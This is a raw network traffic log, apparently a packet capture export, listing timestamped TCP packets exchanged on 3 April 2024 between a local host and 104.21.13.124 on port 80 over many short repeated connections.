Apr 3, 2024 06:38:28.029297113 CEST	80	49818	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:28.029470921 CEST	49818	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:28.156018019 CEST	80	49818	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:28.327128887 CEST	80	49818	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:28.327415943 CEST	49818	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:28.327642918 CEST	80	49818	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:28.327694893 CEST	49818	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:28.451987982 CEST	80	49818	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:28.466964006 CEST	49819	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:28.591388941 CEST	80	49819	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:28.591489077 CEST	49819	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:28.593678951 CEST	49819	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:28.717993021 CEST	80	49819	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:28.718050003 CEST	49819	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:28.842442036 CEST	80	49819	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.010371923 CEST	80	49819	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.010633945 CEST	49819	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.011312962 CEST	80	49819	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.011363983 CEST	49819	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.135049105 CEST	80	49819	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.151451111 CEST	49820	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.276515007 CEST	80	49820	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.276597023 CEST	49820	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.278542995 CEST	49820	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.402962923 CEST	80	49820	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.403072119 CEST	49820	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.527690887 CEST	80	49820	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.710725069 CEST	80	49820	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.711004972 CEST	49820	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.711105108 CEST	80	49820	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.711155891 CEST	49820	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.835455894 CEST	80	49820	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.859086990 CEST	49821	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.983902931 CEST	80	49821	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:29.983979940 CEST	49821	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:29.987306118 CEST	49821	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.111978054 CEST	80	49821	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:30.112055063 CEST	49821	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.236807108 CEST	80	49821	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:30.401864052 CEST	80	49821	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:30.402096987 CEST	49821	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.402483940 CEST	80	49821	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:30.402522087 CEST	49821	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.526896000 CEST	80	49821	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:30.543538094 CEST	49822	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.668473005 CEST	80	49822	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:30.668622017 CEST	49822	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.670975924 CEST	49822	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.797007084 CEST	80	49822	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:30.797080040 CEST	49822	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:30.922838926 CEST	80	49822	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.090198040 CEST	80	49822	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.090686083 CEST	80	49822	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.090951920 CEST	49822	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:31.090998888 CEST	49822	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:31.215948105 CEST	80	49822	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.234883070 CEST	49823	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:31.359769106 CEST	80	49823	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.359910965 CEST	49823	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:31.366750956 CEST	49823	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:31.491453886 CEST	80	49823	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.491519928 CEST	49823	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:31.616254091 CEST	80	49823	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.930062056 CEST	80	49823	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.930398941 CEST	49823	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:31.930489063 CEST	80	49823	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:31.930548906 CEST	49823	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.055289984 CEST	80	49823	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.082963943 CEST	49824	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.208112001 CEST	80	49824	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.208297014 CEST	49824	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.210551023 CEST	49824	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.335490942 CEST	80	49824	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.335652113 CEST	49824	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.460660934 CEST	80	49824	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.636657953 CEST	80	49824	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.636753082 CEST	80	49824	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.636943102 CEST	49824	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.636944056 CEST	49824	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.761945963 CEST	80	49824	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.786163092 CEST	49825	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.912142992 CEST	80	49825	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:32.912281990 CEST	49825	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:32.914570093 CEST	49825	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.038754940 CEST	80	49825	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:33.038847923 CEST	49825	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.163073063 CEST	80	49825	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:33.328829050 CEST	80	49825	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:33.329065084 CEST	80	49825	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:33.329125881 CEST	49825	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.329549074 CEST	49825	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.453922033 CEST	80	49825	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:33.473109007 CEST	49826	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.597615004 CEST	80	49826	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:33.597759962 CEST	49826	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.600213051 CEST	49826	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.724530935 CEST	80	49826	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:33.724842072 CEST	49826	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:33.849193096 CEST	80	49826	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.018080950 CEST	80	49826	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.018443108 CEST	49826	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.018692017 CEST	80	49826	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.018748045 CEST	49826	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.143115044 CEST	80	49826	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.155201912 CEST	49827	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.279861927 CEST	80	49827	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.280117035 CEST	49827	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.282252073 CEST	49827	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.406848907 CEST	80	49827	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.406924963 CEST	49827	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.534203053 CEST	80	49827	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.705063105 CEST	80	49827	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.705544949 CEST	49827	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.705634117 CEST	80	49827	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.705693960 CEST	49827	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.830224037 CEST	80	49827	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.849754095 CEST	49828	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.979576111 CEST	80	49828	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:34.979660034 CEST	49828	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:34.982501984 CEST	49828	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.107290983 CEST	80	49828	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:35.107508898 CEST	49828	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.232268095 CEST	80	49828	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:35.398335934 CEST	80	49828	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:35.398561954 CEST	80	49828	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:35.398586035 CEST	49828	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.398628950 CEST	49828	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.524003983 CEST	80	49828	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:35.546013117 CEST	49829	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.669941902 CEST	80	49829	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:35.670016050 CEST	49829	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.672061920 CEST	49829	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.796045065 CEST	80	49829	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:35.796123028 CEST	49829	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:35.920551062 CEST	80	49829	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.087373972 CEST	80	49829	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.087609053 CEST	49829	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.088501930 CEST	80	49829	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.088586092 CEST	49829	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.211796999 CEST	80	49829	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.231084108 CEST	49830	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.356030941 CEST	80	49830	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.356127024 CEST	49830	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.358340025 CEST	49830	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.484210014 CEST	80	49830	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.484271049 CEST	49830	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.608932018 CEST	80	49830	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.781783104 CEST	80	49830	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.781949043 CEST	80	49830	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.782001019 CEST	49830	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.782028913 CEST	49830	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:36.906744003 CEST	80	49830	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:36.916899920 CEST	49831	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.041688919 CEST	80	49831	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.041799068 CEST	49831	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.043826103 CEST	49831	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.168525934 CEST	80	49831	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.168632984 CEST	49831	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.293581963 CEST	80	49831	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.465118885 CEST	80	49831	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.465396881 CEST	49831	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.465841055 CEST	80	49831	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.465893030 CEST	49831	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.591721058 CEST	80	49831	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.605751991 CEST	49832	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.730410099 CEST	80	49832	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.730524063 CEST	49832	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.732708931 CEST	49832	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.857310057 CEST	80	49832	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:37.857372999 CEST	49832	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:37.981966019 CEST	80	49832	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.151998997 CEST	80	49832	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.152079105 CEST	80	49832	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.152137041 CEST	49832	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.152615070 CEST	49832	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.277147055 CEST	80	49832	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.292154074 CEST	49833	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.417351007 CEST	80	49833	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.417550087 CEST	49833	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.419517040 CEST	49833	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.544574976 CEST	80	49833	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.544631958 CEST	49833	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.669946909 CEST	80	49833	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.836112022 CEST	80	49833	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.836247921 CEST	80	49833	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.836335897 CEST	49833	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.836416006 CEST	49833	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:38.961165905 CEST	80	49833	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:38.979192019 CEST	49834	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:39.103856087 CEST	80	49834	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:39.104028940 CEST	49834	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:39.111241102 CEST	49834	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:39.235083103 CEST	80	49834	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:39.235162020 CEST	49834	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:39.359091043 CEST	80	49834	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:39.536004066 CEST	80	49834	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:39.536391973 CEST	80	49834	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:39.536451101 CEST	49834	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:39.536670923 CEST	49834	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:39.665147066 CEST	80	49834	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:39.693398952 CEST	49835	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:39.819010973 CEST	80	49835	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:39.819103956 CEST	49835	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:40.106892109 CEST	49835	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:40.232286930 CEST	80	49835	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:40.232371092 CEST	49835	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:40.357759953 CEST	80	49835	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:40.525443077 CEST	80	49835	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:40.525724888 CEST	80	49835	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:40.525789022 CEST	49835	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.056874037 CEST	49835	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.182993889 CEST	80	49835	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:42.289518118 CEST	49836	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.414664030 CEST	80	49836	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:42.414762020 CEST	49836	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.416971922 CEST	49836	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.541727066 CEST	80	49836	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:42.541822910 CEST	49836	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.668508053 CEST	80	49836	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:42.843430042 CEST	80	49836	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:42.843727112 CEST	49836	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.843805075 CEST	80	49836	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:42.843863964 CEST	49836	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:42.968677998 CEST	80	49836	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.138528109 CEST	49837	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.262840986 CEST	80	49837	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.262952089 CEST	49837	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.265047073 CEST	49837	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.389740944 CEST	80	49837	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.389837980 CEST	49837	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.513962030 CEST	80	49837	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.688081980 CEST	80	49837	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.688293934 CEST	80	49837	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.688313961 CEST	49837	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.688354969 CEST	49837	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.812566042 CEST	80	49837	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.830387115 CEST	49838	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.955099106 CEST	80	49838	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:43.955213070 CEST	49838	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:43.957175970 CEST	49838	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.082478046 CEST	80	49838	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:44.082529068 CEST	49838	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.207192898 CEST	80	49838	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:44.379744053 CEST	80	49838	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:44.379905939 CEST	80	49838	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:44.379946947 CEST	49838	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.380007029 CEST	49838	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.505414963 CEST	80	49838	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:44.512314081 CEST	49839	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.636349916 CEST	80	49839	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:44.636457920 CEST	49839	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.645217896 CEST	49839	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.769753933 CEST	80	49839	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:44.769838095 CEST	49839	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:44.893834114 CEST	80	49839	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.064080954 CEST	80	49839	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.064341068 CEST	49839	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.064918995 CEST	80	49839	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.064974070 CEST	49839	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.190413952 CEST	80	49839	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.208689928 CEST	49840	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.333559036 CEST	80	49840	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.333666086 CEST	49840	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.335994959 CEST	49840	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.460966110 CEST	80	49840	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.461213112 CEST	49840	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.585998058 CEST	80	49840	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.751863956 CEST	80	49840	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.752273083 CEST	49840	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.752444983 CEST	80	49840	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.752530098 CEST	49840	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:45.877101898 CEST	80	49840	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:45.895006895 CEST	49841	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.020036936 CEST	80	49841	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.020188093 CEST	49841	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.022619963 CEST	49841	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.147932053 CEST	80	49841	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.148027897 CEST	49841	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.272794008 CEST	80	49841	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.588614941 CEST	80	49841	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.589260101 CEST	49841	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.589760065 CEST	80	49841	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.589816093 CEST	49841	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.714016914 CEST	80	49841	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.729598999 CEST	49842	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.854430914 CEST	80	49842	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.854609966 CEST	49842	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.856471062 CEST	49842	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:46.981858015 CEST	80	49842	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:46.982182026 CEST	49842	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:47.107428074 CEST	80	49842	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:47.415154934 CEST	80	49842	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:47.415266037 CEST	80	49842	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:47.415441036 CEST	49842	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:47.415565014 CEST	49842	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:47.540421963 CEST	80	49842	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:47.560441971 CEST	49843	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:47.684956074 CEST	80	49843	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:47.685307026 CEST	49843	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:47.687505007 CEST	49843	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:47.812414885 CEST	80	49843	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:47.812503099 CEST	49843	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:47.936816931 CEST	80	49843	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.109585047 CEST	80	49843	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.109853983 CEST	49843	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.110239983 CEST	80	49843	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.110291004 CEST	49843	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.234251976 CEST	80	49843	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.252931118 CEST	49844	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.377366066 CEST	80	49844	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.377458096 CEST	49844	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.379698992 CEST	49844	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.504065990 CEST	80	49844	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.504187107 CEST	49844	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.628524065 CEST	80	49844	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.798671007 CEST	80	49844	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.798866987 CEST	80	49844	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.798918962 CEST	49844	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.799248934 CEST	49844	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:48.923676968 CEST	80	49844	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:48.935008049 CEST	49845	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.059787035 CEST	80	49845	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.060029030 CEST	49845	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.062803984 CEST	49845	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.187179089 CEST	80	49845	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.187238932 CEST	49845	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.311649084 CEST	80	49845	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.483000040 CEST	80	49845	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.483231068 CEST	49845	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.483346939 CEST	80	49845	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.483397961 CEST	49845	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.607599020 CEST	80	49845	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.621396065 CEST	49846	80	192.168.2.4	104.21.13.124
